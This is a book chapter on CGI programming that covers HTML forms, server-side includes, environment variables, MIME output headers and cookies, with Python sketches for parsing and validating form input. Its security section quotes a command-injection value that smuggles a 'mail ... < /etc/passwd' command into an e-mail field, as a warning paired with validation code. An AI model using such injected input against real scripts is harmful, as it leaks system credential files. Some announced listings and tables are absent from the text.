UNIX Unleashed, Internet Edition
- 17 -
Programming Web Pages with CGI
by Robin Burk; David B. Horvath, CCP; and Matthew Curtin
So far in this section, we've seen how HTML can be used to specify the content and appearance of screen text and how MIME extends those capabilities to include other media such as graphics, audio, and video.
These elements on a Web page are static. That is, they are output to the user without soliciting or responding to user input (with the possible exception of hotlinks that allow the user to specify which media files to retrieve and when).
Web pages are not limited to static information displays, however. The Web, and indeed the entire Internet, is based on a client-server architecture. Interactions between client machines and Net servers provide much of the Web's flexibility and usefulness, contributing greatly to its rapid growth and the use of the Web for serious business purposes.
In this chapter, we'll look at the client side of one enabling, interactive technology: the Common Gateway Interface. In the following chapters, we'll look at CGI from the server side as well.
What Is the Common Gateway Interface?
The Common Gateway Interface (CGI) defines a platform-independent gateway from HTML scripts to other processes executing on the server. The most common use of CGI on Web pages is to pass data gathered on a screen form to a database application, and to populate a new client screen with appropriate information in response.
CGI mostly executes on the server. In the next few chapters of this section of UNIX Unleashed, we'll examine the details of CGI server-side implementation on UNIX using a variety of script and compiled languages.
However, an important part of this interactive process is the user interface for capturing user input and reporting information back to the user. It's this client side of CGI that we'll examine in this chapter.
What CGI Is Not
SSI (Making dynamic pages without CGI)
SSI (Server-Side Includes) can also be used to generate dynamic pages. The server parses the HTML of the requested file, looks for certain commands embedded inside HTML comments, and executes them. The server can even be configured to execute shell commands. Does this scare you? It should. The server reads the HTML and will execute things contained therein. If shell commands and CGI programs are allowed to be called, this is a very dangerous feature, especially if you allow users to publish their own pages (via the public_html directory in their home directories) and allow SSI in those directories.
Does this mean that SSI is always a Bad Thing and should always be avoided? No. I mention SSI in the context of CGI because it's a good idea to know what your options are and what makes sense in various situations, so you can use the right technology to get the end result that you want. SSI is appropriate for smaller-scale customizations of web pages, such as page headers, page footers, and other things that can be accomplished without an SSI exec. CGI, on the other hand, is a means of making much more sophisticated web-based applications and of handling things like forms input. Generally speaking, if the focus of what you're writing is the HTML, with minor customizations to be done on the server, SSI is a good choice. If the focus is the dynamic part of your content, perhaps including only small bits of preformatted HTML, CGI is the way to go. It's also important to note that CGI is a standard interface, whereas SSI is an invention of the NCSA HTTPd folks, although it's now widely supported on other web servers as well. SSI might present a compatibility problem for you in the future if you decide to move from one server to another.
More information is provided in the Server-Side Includes section later in this chapter.
Server APIs vs. CGI
Web server software such as Apache and Netscape's offerings lets you write code that effectively becomes a part of the web server itself. In some cases, this could be useful (such as when it would be beneficial to add some functionality to the core server). However, use of a server's API will limit your program's portability to one server, OS, and processor architecture. If what you want to do is simply something that should be part of the server's core functionality, and the API gives you the support you need, go for it. But for the vast majority of server-side processing, CGI is the way to go.
How CGI Works
The client-server interaction in CGI follows a series of standard steps:
On the client side, processing occurs by means of HTML tags, which are interpreted the same way as other tags. On the server side, UNIX environmental variables, command-line arguments, and standard input and output files can be used to communicate between the Web server and the CGI program.
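The server's half of this exchange can be sketched in Python. This is only an illustration, not how any particular Web server is implemented: the names run_cgi and CGI_PROGRAM are invented for the example, and the stand-in CGI program simply echoes what it was handed. REQUEST_METHOD, QUERY_STRING, CONTENT_LENGTH, and CONTENT_TYPE are standard CGI variable names.

```python
import os
import subprocess
import sys

# A stand-in CGI program (hypothetical): it echoes what the server handed it.
CGI_PROGRAM = r'''
import os, sys
length = int(os.environ.get("CONTENT_LENGTH", "0"))
body = sys.stdin.read(length)
sys.stdout.write("Content-type: text/plain\n\n")
sys.stdout.write("method=" + os.environ["REQUEST_METHOD"] + "\n")
sys.stdout.write("query=" + os.environ["QUERY_STRING"] + "\n")
sys.stdout.write("body=" + body + "\n")
'''


def run_cgi(method, query_string, body=""):
    """Play the Web server's part: set variables, feed stdin, collect stdout."""
    env = dict(os.environ)  # keep PATH and friends so the child can start
    env.update({
        "REQUEST_METHOD": method,
        "QUERY_STRING": query_string,
        "CONTENT_LENGTH": str(len(body.encode("ascii"))),
        "CONTENT_TYPE": "application/x-www-form-urlencoded",
    })
    result = subprocess.run(
        [sys.executable, "-c", CGI_PROGRAM],
        input=body, env=env, capture_output=True, text=True, check=True,
    )
    return result.stdout


if __name__ == "__main__":
    print(run_cgi("POST", "query=1", "userid=joeuser"))
```

The child process never sees the network connection. Everything it knows about the request arrives through its environment and standard input, and everything it says goes back through standard output.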
Basic Forms: Tags and Attributes
CGI forms are defined using HTML tags and elements that are dedicated to this purpose.
The FORM tag begins the definition of a form. Any number of forms may be defined on a given HTML page, but forms cannot be nested within one another. When designing Web pages that make use of forms, therefore, think about the logical flow of information and divide complex forms into successive, simpler ones if doing so would help the user keep track of the information and choices he must specify.
Any other legal HTML tags may be embedded within a form definition. Standard HTML is used, for instance, to label the input fields and the form itself.
<FORM ACTION="/cgi-bin/new-query" METHOD=POST>
The INPUT tag is used to define various types of input fields within a form.
Listing 17.1 shows a typical sequence of field definitions and other HTML tags that might be used in a form.
Listing 17.1. Field definitions for a form.
<P>
Enter Userid:
<INPUT TYPE=text NAME="userid" VALUE="enter id here" SIZE=15 MAXLENGTH=15>
<P>
and Password:
<INPUT TYPE=password NAME="passwd" VALUE="(required)" SIZE=10 MAXLENGTH=10>
<P>
<INPUT TYPE=checkbox NAME="option1" >Choose option 1
<INPUT TYPE=checkbox NAME="option2" > and option 2 if you like<BR>
<P>
<P>
Select one of the following:
<INPUT TYPE=radio VALUE="a" NAME="choice" CHECKED > A
<INPUT TYPE=radio VALUE="b" NAME="choice" > B
<INPUT TYPE=radio VALUE="c" NAME="choice" > C<BR>
<P>
<INPUT TYPE=file NAME="send-file">
<INPUT TYPE=hidden NAME="user-state" VALUE="been here already">
These field definitions would result in the screen form shown in Figure 17.1.
Several aspects of this form are worth noting at this point. First, notice the use of standard HTML scripting to assign labels to the text and password fields and to display a header for the checkbox and radio button lists.
Second, notice that the browser (not the programmer) assigns the button label for file fields. This reminds us that HTML passes directives to the Web client (browser), but is not a text-formatting language. As with other tags, the screen results displayed by various browsers may differ when processing certain form-related tags.
And finally, note that the hidden field does not appear on the screen.
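To see what such a form hands to the server, the following Python sketch encodes a set of made-up field values the way a browser does for a form with the default encoding. The values and the function name encode_form are invented for illustration. The file field is left out because uploading a file requires a different encoding (multipart/form-data), which this sketch does not cover.

```python
from urllib.parse import urlencode

# Values a user might have entered into the form in Listing 17.1 (made up).
submitted = [
    ("userid", "joeuser"),
    ("passwd", "secret"),
    ("option1", "on"),   # a checked box with no VALUE attribute sends "on"
    ("choice", "a"),     # only the selected radio button is sent
    ("user-state", "been here already"),  # hidden fields are sent too
]


def encode_form(fields):
    """Encode name/value pairs as application/x-www-form-urlencoded text."""
    return urlencode(fields)


if __name__ == "__main__":
    print(encode_form(submitted))
    # userid=joeuser&passwd=secret&option1=on&choice=a&user-state=been+here+already
```

Note that the unchecked option2 box contributes nothing at all, and that the password travels as plain text unless the connection itself is encrypted.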
Although INPUT is the basic field definition tag, client-side CGI offers a number of other interactive capabilities for advanced forms processing.
SELECT and OPTION
The SELECT and OPTION tags provide a way to define a menu of options and capture the user's selection. Although you could hard-code this functionality using checkboxes and radio buttons, the SELECT list provides a more sophisticated menu effect and saves considerable screen space if the selection list is long.
As with the INPUT TYPE=file construct, different browsers may display a SELECT menu in somewhat different ways. All will, however, provide the user with a scrollable list of options from which to choose.
As with other HTML tags, the <SELECT> tag must be paired with a closing </SELECT> tag. In addition to the attributes associated with the SELECT tag itself, the selection list is defined as a series of <OPTION> tags between the <SELECT> and </SELECT> pair.
Listing 17.2 shows the definition of two SELECT lists.
Listing 17.2. Defining SELECT lists.
Please choose an option from the menu:
<SELECT NAME="pulldown" SIZE=1>
<OPTION>menu choice 1
<OPTION>menu choice 2
<OPTION>menu choice 3
</SELECT>
<P>
Please choose an option from the scrolling window:
<SELECT NAME="scrolling" SIZE=2>
<OPTION> window choice 1
<OPTION> window choice 2
<OPTION> window choice 3
</SELECT>
<P>
Figure 17.2 shows the resulting form display on the browser.
The TEXTAREA tag is used to create a multiple-line field for free-form text entry. Web page designers often add a textarea field to collect user comments, e-mail to the web author, or similar unstructured information.
As with SELECT, TEXTAREA requires a beginning and ending tag. Between these tags, and in addition to the attributes of the tag, the programmer can enter variable-length default text that will display when the textarea field is drawn on the screen. This text must be deleted by the user before he enters his own input.
Listing 17.3 defines a TEXTAREA field and Figure 17.3 shows the resulting form on the Netscape browser.
Listing 17.3. Defining a free-form TEXTAREA.
<P>
Please add any comments or special instructions below:
<P>
<TEXTAREA NAME="terms" ROWS=6 COLS=50>
(comments)
</TEXTAREA>
HTML has no provision for defining and calling subroutines. However, a similar functionality can be added to your Web pages by means of a technique called server-side includes.
This technique consists of asking the Web server to execute HTML code that is not included in the current HTML document. This allows reuse of standard lists, forms, or other information across multiple pages without running the risk that updates to the information would occur on some pages but not on others.
Another use for server-side includes is to dynamically create HTML as output from one page, then execute it within the shell of another page. This is a somewhat awkward way to embed dynamic HTML in your Web site, but is occasionally useful.
The syntax for server-side includes is as follows:
While retrieving and transmitting the base HTML document, the server will encounter this line and insert the contents of the specified file into the document at that point.
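The insertion step can be imitated in a few lines of Python. This is a sketch of the idea only, not the code of any real server. It assumes the NCSA/Apache-style directive written as an HTML comment of the form <!--#include file="name" -->, and the function name expand_includes is invented for the example. Like those servers, it refuses absolute paths and references to parent directories.

```python
import os
import re
import tempfile

# Matches directives of the form <!--#include file="name" -->
INCLUDE = re.compile(r'<!--#include\s+file="([^"]+)"\s*-->')


def expand_includes(html, base_dir):
    """Replace each include directive with the contents of the named file."""
    def replace(match):
        name = match.group(1)
        # Refuse absolute paths and parent-directory references.
        if os.path.isabs(name) or ".." in name.split("/"):
            return "[include refused]"
        with open(os.path.join(base_dir, name), encoding="utf-8") as handle:
            return handle.read()
    return INCLUDE.sub(replace, html)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as folder:
        with open(os.path.join(folder, "footer.html"), "w", encoding="utf-8") as out:
            out.write("<HR>Maintained by the webmaster")
        page = '<P>Welcome</P>\n<!--#include file="footer.html" -->'
        print(expand_includes(page, folder))
```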
This technique imposes additional burden on the server system. In most cases, this has a negligible effect; however, on busy systems or in the case of very large include files, the resources necessary to interpret the included HTML can impact server performance.
It is customary (but not necessary) to name documents with server-side includes using the extension .shtml and to configure the Web server software such that all files with this extension are actively parsed by the server. In this case, files with the .html extension would be transmitted to the client without interpretation.
Client-side CGI provides Web page developers with a rich set of form elements. As we'll see in subsequent chapters, server-side CGI provides an equally rich set of gateway and data manipulation capabilities.
Having good tools doesn't automatically guarantee that they will be used well, however. For your Web pages to be effective, you must pay attention to some design and coding considerations.
Fortunately, with most Web clients (browsers) you can view forms as you create them by loading the HTML file into the browser program. This will allow you to check out a page and experiment with design approaches without having a programmed server at hand.
Here are some guidelines and tips for creating attractive, easy-to-use Web pages that include forms:
When you access a Web page (by specifying the URL or clicking on a link in another page), the server uses the provided path and retrieves it for your browser. The same thing occurs when your browser requests an image, sound file, or other file. When the item desired is static or nearly so in nature (like vacation photographs or the list of your top 10 favorite teachers), simple HTML files are an easy way to go.
But if the data is not static, someone must constantly maintain and update the HTML. If the data changes frequently (like the weather or the stock market), this becomes difficult. Given the time involved in researching the data by hand and updating the HTML, the page is already out of date by the time it is available. In addition, we all have better things to do than be report formatters.
Instead of loading a static HTML file, a CGI script can be executed. The script does whatever research is necessary (database lookups, calculations, and so on) and then writes out HTML code to dynamically create the page. Instead of the data being hours or even weeks out of date through the manual process, it can be as current as processing and Internet time lags allow (seconds).
How To Execute CGI
When you are coding your HTML, you can reference a CGI script just like a Web page or other resource (image, sound, and so on). The server determines that the resource is a file to execute, not to send. Some servers require that these files, no matter what their names, be placed in a special directory so that they are easy to identify.
The URL used to execute a CGI script when the user clicks on a link might look like the following:
<a href="http://www.company.domain/cgi-bin/environ?query=1"> xxx </a>
The URL used to automatically execute a CGI script when the page is loaded (to update and display a counter in the form of a gif image) might look like the following:
You must code your scripts carefully to prevent input data from being executed. You must verify the size, form, and validity of input data. If you expect an e-mail address as input (and use it to send mail to that address), you must make sure that it is just an e-mail address. If the user types in her proper e-mail address, everything works fine. But if she decides to be difficult and enters her e-mail address as
email@example.com ; mail firstname.lastname@example.org < /etc/passwd
then a script that passes this string to the shell unchecked has just mailed your password file to firstname.lastname@example.org.
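One way to guard against this kind of input is sketched below in Python. It is an illustration under stated assumptions, not a complete mail routine: the pattern is deliberately stricter than the real e-mail address grammar, the length limit is arbitrary, the sendmail path /usr/sbin/sendmail is a guess that varies by system, and the function names are invented. The two ideas it shows are checking the whole input against a narrow pattern and handing the address to the mail program as a separate argument so that no shell ever parses it.

```python
import re
import subprocess

# Deliberately strict pattern (an assumption, not a full address parser):
# starts with a letter or digit, contains exactly one "@", no spaces.
SAFE_ADDRESS = re.compile(r"[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
MAX_LENGTH = 254  # arbitrary upper bound for this sketch


def is_safe_address(text):
    """Return True only if the whole string looks like one e-mail address."""
    return len(text) <= MAX_LENGTH and SAFE_ADDRESS.fullmatch(text) is not None


def mail_command(address):
    """Build an argument list for the mailer; no shell parses the address."""
    if not is_safe_address(address):
        raise ValueError("rejected suspicious address")
    return ["/usr/sbin/sendmail", address]  # path is an assumption


def send_mail(address, message):
    """Send message to address; raises if the address fails validation."""
    subprocess.run(mail_command(address), input=message, text=True, check=True)


if __name__ == "__main__":
    bad = "email@example.com ; mail firstname.lastname@example.org < /etc/passwd"
    print(is_safe_address("joeuser@example.com"), is_safe_address(bad))
```

Because the command is passed as a list rather than a single string, characters such as ; and < have no special meaning even if a bad value were to slip past the check.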
Many security problems arise because the system was designed and implemented by people who didn't understand the environment where the application would be deployed.
Here are some tips that will be useful in developing good CGI programs.
Following these simple guidelines will prevent you from needlessly limiting your audience, hindering your program's usefulness, and compromising the privacy of people using it.
Data Available to the Shell Script
There are a number of environmental variables and other data sources available to a CGI script, whether it is written as a shell script or in any other language. The variables and their values vary with the Web server and with the Web browser being used on the client side.
Table 17.1 shows the common environmental variables available to CGI scripts. These are in addition to the normal variables that may be available from the shell itself.
Table 17.1. Environmental variables.
In addition to the query string that is attached to the URL after the ? (returned through the environment variable QUERY_STRING), data is available through STDIN (standard input). The data will be in the form described by CONTENT_TYPE and will be CONTENT_LENGTH bytes long.
There is no guarantee that there will be an end-of-file indication at the end of the input. Read exactly CONTENT_LENGTH bytes and then decode the data as necessary. Data submitted from a form typically has a CONTENT_TYPE of 'application/x-www-form-urlencoded': the fields arrive as name=value pairs separated by &, spaces are sent as +, and other special characters are replaced by % followed by their two-digit hexadecimal code (a space may also appear as %20).
Output from CGI scripts is written to STDOUT (standard output). It should begin with an HTTP header to tell the browser what kind of data it is getting. Anything after that is interpreted as that type of data by the browser. If the browser is told that it is getting HTML, it will interpret it as HTML; if it is told that a gif file is coming from the server, it will attempt to interpret what follows as a gif image.
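A CGI program's input handling can be sketched in Python as follows. The function name read_form and the size cap MAX_BODY are invented for the example, and the demonstration at the bottom simulates a request instead of reading a real one. In an actual script you would pass os.environ and sys.stdin.buffer.

```python
import io
from urllib.parse import parse_qs

MAX_BODY = 64 * 1024  # arbitrary cap (an assumption) to reject oversized posts


def read_form(environ, stdin):
    """Return form fields from standard input (POST) or QUERY_STRING (GET)."""
    if environ.get("REQUEST_METHOD", "GET").upper() == "POST":
        length = int(environ.get("CONTENT_LENGTH") or 0)
        if length > MAX_BODY:
            raise ValueError("request body too large")
        # Read exactly CONTENT_LENGTH bytes; do not wait for end-of-file.
        raw = stdin.read(length).decode("ascii")
    else:
        raw = environ.get("QUERY_STRING", "")
    # parse_qs decodes %XX escapes and "+" and returns {name: [values]}.
    return parse_qs(raw, keep_blank_values=True)


if __name__ == "__main__":
    body = b"userid=joe+user&choice=a%20or%20b"
    env = {"REQUEST_METHOD": "POST", "CONTENT_LENGTH": str(len(body))}
    print(read_form(env, io.BytesIO(body)))
```

Each name maps to a list because a form may legitimately send the same name more than once, for example from a group of checkboxes that share a NAME.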
At the beginning of every CGI script, you need to tell the client browser what it is you are sending. This is done through the first two lines:
Content-type: text/html

The first line gives the type of data; the second line is always blank. The server will add additional information as needed.
The most basic type is text/html, which, as the name implies, denotes HTML code in a text format (no binary data). These are referred to as MIME (Multipurpose Internet Mail Extensions) types (MIME is explained in Chapter 16 of Volume 2) and are used to specify the type of data and the encoding method used to transmit that data.
Table 17.2 shows the common content types. The Web browser might not be able to handle a specific type directly. In that case, it will use what are known as "helpers" or "helper applications," which are external programs that are able to handle the content.
Table 17.2. Common content types.
CONTENT_TYPE tells your script what it received from the browser; HTTP_ACCEPT tells it what the browser can display.
It is up to you as a programmer to ensure that your output conforms to the specifications for a particular type. If it does not, the correct results will not be displayed and the users will be annoyed.
The Minimal Response
At a minimum, your CGI script needs to send the content type back to the Web browser and should send something meaningful back (after all, that is why a CGI script is executed--to do something).
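A minimal response might look like the following Python sketch. The function name minimal_response and the page content are invented for illustration. The parts that matter are the Content-type line, the blank line after it, and the HTML that follows.

```python
import html
import sys
import time


def minimal_response(title, message):
    """Return a complete CGI response: header line, blank line, HTML body."""
    body = (
        "<HTML><HEAD><TITLE>{0}</TITLE></HEAD>\n"
        "<BODY><H1>{0}</H1>\n<P>{1}</P></BODY></HTML>\n"
    ).format(html.escape(title), html.escape(message))
    return "Content-type: text/html\n\n" + body


if __name__ == "__main__":
    now = time.strftime("%Y-%m-%d %H:%M:%S")
    sys.stdout.write(minimal_response("Hello", "Generated at " + now))
```

Escaping the text with html.escape keeps characters such as < and & in the message from being mistaken for markup.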
As previously mentioned, the URL used for CGI scripts might be different depending on the server software used. Some look for the files in one location while others require different locations.
You should talk to your local administrator or ISP for more information on exactly how to code your URLs and where to place your files when using CGI scripts. The ISP I use requires that CGI scripts go in the subdirectory cgi-bin under public_html. When referencing the scripts, only the cgi-bin directory is mentioned.
The technique of creating HTML code in a CGI script is referred to as "Dynamic HTML" because it can change depending on the results of the script being executed. HTML in a regular file (the "normal" way of doing things) does not change unless you replace it, so it is fairly static. Each user could see something different out of a CGI script, so it is very dynamic.
One of the more common uses for CGI scripts is processing the data received from HTML forms. The form method is coded as POST and the action is the URL for your script. The user enters data through his Web browser into the form described in HTML, and when he clicks the submit button, your script is executed.
There are a number of ways to deal with the data received from the form. You can save it to a file, you can mail it to someone or a mail-enabled application, or you can perform more complex processing. You might enter someone in a database, send her a confirmation e-mail, and then add her to an e-mail mailing list. Or you could just save the data (signing a Web page guest book or filling out a comments form are common examples).
Sending the data as e-mail to a user is the simplest method because you do not have to deal with file or record locking issues. This is especially important if your ISP or system administrator will not let you execute binaries on the system. If you could execute binaries, then you could use a program to access a database.
Some Internet Service Providers will not allow you to execute your CGI scripts directly. Mine enforces this restriction. I have to execute a program that then executes my script. This is known as wrappering or wrapping--my code is run by other code.
There are a number of purposes for this. The wrapper can control the amount of CPU, I/O, and other resources my script is able to use (preventing runaway or system-hogging scripts), can provide additional security, and do some of the setup for you by resolving environment variables. Another important feature is the ability to run the wrapper in debugging mode. In that mode it shows all the environment variables that were passed to my script so that debugging is much easier.
The only downside that I have seen so far with the wrapper is that the URL was a little confusing until I got used to it. Instead of coding:
<a href="~joeuser/cgi-bin/test.ksh">Link Text</a>
I have to code:
<a href="/cgi-bin/cgiwrap/joeuser/test.ksh">Link Text</a>
Cookies are another way to maintain state information. A cookie is simply a bit of data that contains a number of name/value pairs that is passed between the client and the server in the HTTP header, rather than in the query string. In addition to name/value pairs, a number of other optional attributes exist.
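As a rough sketch of both directions of this exchange, the Python fragment below builds a Set-Cookie header line for a response and reads cookies back from a later request. It uses the standard http.cookies module. The function names and the cookie name visits are invented for the example, and HTTP_COOKIE is the variable in which Web servers conventionally hand the browser's cookies to a CGI program.

```python
from http.cookies import SimpleCookie


def set_cookie_header(name, value, path="/"):
    """Return a Set-Cookie line to print before the blank header line."""
    cookie = SimpleCookie()
    cookie[name] = value
    cookie[name]["path"] = path  # one of the optional attributes
    return cookie.output()


def read_cookies(environ):
    """Parse the HTTP_COOKIE variable into a plain {name: value} dict."""
    cookie = SimpleCookie()
    cookie.load(environ.get("HTTP_COOKIE", ""))
    return {key: morsel.value for key, morsel in cookie.items()}


if __name__ == "__main__":
    print(set_cookie_header("visits", "3"))
    print(read_cookies({"HTTP_COOKIE": "visits=3; user=joe"}))
```

The Set-Cookie line belongs with the Content-type line, before the blank line that ends the header.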
Beware that cookies are still at a preliminary state in their specification. You might find that things suddenly don't behave quite the way you'd expect when someone is using a different version of a cookie-supporting browser. The official specification is kept at
Reference to CGI Resources
There are many resources available on the Internet and in printed books. The following are some starting points:
CGI Scripting Overview
Yahoo's CGI links
Using HTML 3.2, Java 1.1, and CGI, Eric Ladd and Jim O'Donnell, Que Corporation, 1996, ISBN 0-7897-0932-5.
The Common Gateway Interface (CGI) provides a powerful and flexible way to extend Web page functionality.
Client-side CGI is programmed using HTML tags, resulting in forms that capture user input and transmit it to server-side applications. The server side of CGI passes this information to application programs that return updated Web pages and other information to the client system.
There are three general categories of tools for the development of CGI:
Each of these tools has its own advantages and disadvantages. Each does some things better and some things worse than the other tools. The next three chapters will provide information on developing CGI using tools in each of these categories.